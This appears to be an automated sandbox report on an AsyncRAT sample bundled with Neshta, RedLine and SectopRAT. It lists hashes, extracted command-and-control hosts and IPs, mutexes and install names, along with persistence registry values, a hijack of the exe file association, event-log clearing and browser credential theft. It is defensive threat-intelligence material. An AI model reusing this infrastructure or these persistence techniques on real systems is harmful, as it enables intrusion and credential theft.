asyncrat | cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7

Analysis

max time kernel
150s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
06-08-2024 13:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe
Size

1.7MB
MD5

b770d62550d8ff48c7fd45dd04d790f2
SHA1

3c4747ad182898466a9314e536fda1fe5983db42
SHA256

cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7
SHA512

602a3f853fad15269234257501386a12d8992b0390ae8f2808c2f31ab56c75746cde5b913843fa82277fbe6837a1eb0feb7df636d1bc6026d359f578e5154413
SSDEEP

49152:cKJU9ltTMMRYpY4TJtqjv7KtGQdHyedH7:zi5TMM+Dg7K0WHj7

Score

10^/10

asyncrat neshta redline sectoprat default gia.o7lab.me:26644 o7lab credential_access defense_evasion discovery execution infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

o7lab

154.216.20.242:5000

gia.o7lab.me:5000

Mutex

GpMiIzUX7KoW

Attributes

delay
3
install
false
install_file
$77svchost.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

blue.o7lab.me:7777

server.underground-cheat.xyz:7777

Mutex

dtDtRWyW1m1g

Attributes

delay
3
install
false
install_file
$77WinUpdate.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

154.216.20.242:4449

Mutex

shoogvdlxg

Attributes

delay
1
install
true
install_file
$77pop2.exe
install_folder
%AppData%

aes.plain

Extracted

Family

redline

Botnet

gia.o7lab.me:26644

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Neshta payload 48 IoCs

resource	yara_rule
behavioral2/files/0x000100000002aa47-2135.dat	family_neshta
behavioral2/files/0x000100000002aa4a-2244.dat	family_neshta
behavioral2/files/0x0008000000027906-2254.dat	family_neshta
behavioral2/files/0x000100000002aa46-2347.dat	family_neshta
behavioral2/files/0x000100000002aa45-2349.dat	family_neshta
behavioral2/files/0x00070000000278b5-2393.dat	family_neshta
behavioral2/files/0x00010000000105ab-2427.dat	family_neshta
behavioral2/files/0x0001000000010418-2431.dat	family_neshta
behavioral2/files/0x000100000001040f-2430.dat	family_neshta
behavioral2/files/0x0001000000010413-2429.dat	family_neshta
behavioral2/files/0x000100000001040e-2428.dat	family_neshta
behavioral2/files/0x0001000000010471-2426.dat	family_neshta
behavioral2/files/0x000100000001047d-2425.dat	family_neshta
behavioral2/files/0x00010000000104c7-2423.dat	family_neshta
behavioral2/files/0x0001000000010475-2422.dat	family_neshta
behavioral2/files/0x000100000001047b-2420.dat	family_neshta
behavioral2/files/0x0001000000010619-2418.dat	family_neshta
behavioral2/files/0x000100000001035e-2417.dat	family_neshta
behavioral2/files/0x000100000001033f-2416.dat	family_neshta
behavioral2/files/0x000100000001025d-2415.dat	family_neshta
behavioral2/files/0x0001000000010355-2414.dat	family_neshta
behavioral2/files/0x000100000002a5b8-2413.dat	family_neshta
behavioral2/files/0x000100000002a5ba-2412.dat	family_neshta
behavioral2/files/0x000100000002a579-2411.dat	family_neshta
behavioral2/files/0x000100000002a57c-2410.dat	family_neshta
behavioral2/files/0x000100000002a5b9-2409.dat	family_neshta
behavioral2/files/0x000100000002a57b-2407.dat	family_neshta
behavioral2/files/0x000100000002a57a-2406.dat	family_neshta
behavioral2/files/0x0001000000028b64-2405.dat	family_neshta
behavioral2/files/0x0001000000028b63-2404.dat	family_neshta
behavioral2/files/0x0001000000028b62-2403.dat	family_neshta
behavioral2/files/0x0001000000029c54-2402.dat	family_neshta
behavioral2/files/0x0001000000028bb8-2401.dat	family_neshta
behavioral2/files/0x00070000000278bd-2394.dat	family_neshta
behavioral2/files/0x0003000000027995-2400.dat	family_neshta
behavioral2/files/0x00090000000278bf-2399.dat	family_neshta
behavioral2/files/0x0005000000027991-2392.dat	family_neshta
behavioral2/files/0x0002000000027917-2391.dat	family_neshta
behavioral2/files/0x00050000000279d0-2390.dat	family_neshta
behavioral2/files/0x000200000002792f-2389.dat	family_neshta
behavioral2/files/0x00050000000279be-2388.dat	family_neshta
behavioral2/files/0x000200000002791c-2387.dat	family_neshta
behavioral2/files/0x00020000000278ad-2386.dat	family_neshta
behavioral2/files/0x00050000000279bd-2385.dat	family_neshta
behavioral2/files/0x000700000002789a-2384.dat	family_neshta
behavioral2/files/0x00070000000278a6-2383.dat	family_neshta
behavioral2/files/0x000700000002789e-2382.dat	family_neshta
behavioral2/files/0x00050000000279cb-2380.dat	family_neshta

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/3640-4206-0x0000000000A40000-0x0000000000A5E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/3640-4206-0x0000000000A40000-0x0000000000A5E000-memory.dmp	family_sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 232 created 644	232	powershell.EXE	5

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/files/0x000100000002aa4c-2172.dat	family_asyncrat
behavioral2/files/0x000600000002aa62-4628.dat	family_asyncrat

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Executes dropped EXE 43 IoCs

pid	Process
2036	adns.exe
2736	xuolte.exe
3912	xuolte.exe
3568	Install.exe
4944	svchost.com
4196	$77SVC~1.EXE
3576	svchost.com
2844	svchost.com
3708	svchost.com
1616	dqplkd.exe
1912	svchost.com
4884	WinUpdate.exe
332	svchost.com
2076	WINUPD~1.EXE
2980	svchost.com
2036	iyrven.exe
3564	svchost.com
2564	svchost.com
3912	$77pop2.exe
3188	svchost.com
4904	svchost.com
2008	WinUpdate.exe
4108	svchost.com
3640	omiliz.exe
2972	svchost.com
4852	svchost.com
1524	svchost.com
3212	birgjg.exe
4020	svchost.com
4492	svchost.com
4468	eggbgo.exe
3800	svchost.com
4704	svchost.com
1596	irlkvs.exe
5004	svchost.com
3180	svchost.com
3284	lldmcn.exe
4008	svchost.com
4412	svchost.com
2856	epvjxr.exe
3512	svchost.com
4296	svchost.com
3916	kzoglp.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	xuolte.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\Taskhostw = "C:\\Users\\Admin\\AppData\\Local\\Taskhostw.exe"	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\Okqpfkqo = "C:\\Users\\Admin\\AppData\\Local\\Okqpfkqo.exe"	adns.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\Twhyp = "C:\\Users\\Admin\\AppData\\Local\\Twhyp.exe"	iyrven.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
232	powershell.EXE
548	powershell.exe
3532	powershell.exe
4908	powershell.exe
4976	powershell.exe
656	powershell.exe
4104	powershell.exe
4304	powershell.exe
1244	powershell.exe
1092	powershell.exe
4804	powershell.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2064 set thread context of 868	2064	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe	88
PID 2036 set thread context of 3040	2036	adns.exe	95
PID 232 set thread context of 1788	232	powershell.EXE	150

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\identity_helper.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\Installer\setup.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe	xuolte.exe
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	svchost.com
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeComRegisterShellARM64.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\elevation_service.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedgewebview2.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge_proxy.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\notification_helper.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wabmig.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpconfig.exe	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\pwahelper.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\msedge_proxy.exe	xuolte.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\cookie_exporter.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	xuolte.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateBroker.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateOnDemand.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe	xuolte.exe
File opened for modification	C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\pwahelper.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateCore.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	xuolte.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	xuolte.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdate.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateComRegisterShell64.exe	xuolte.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	xuolte.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	svchost.com

Drops file in Windows directory 51 IoCs

description	ioc	Process
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	WinUpdate.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	WinUpdate.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	xuolte.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xuolte.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iyrven.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xuolte.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	omiliz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77SVC~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cb8c4074612cd630a1907bf5aeb4c2ec70bd8ecff6dac5ef1f4704a36abc38c7.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
2372	timeout.exe
1104	timeout.exe
1856	timeout.exe
3936	timeout.exe

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2372	ipconfig.exe
3820	ipconfig.exe
2428	ipconfig.exe
3616	ipconfig.exe
3452	ipconfig.exe
4620	ipconfig.exe

Modifies data under HKEY_USERS 55 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
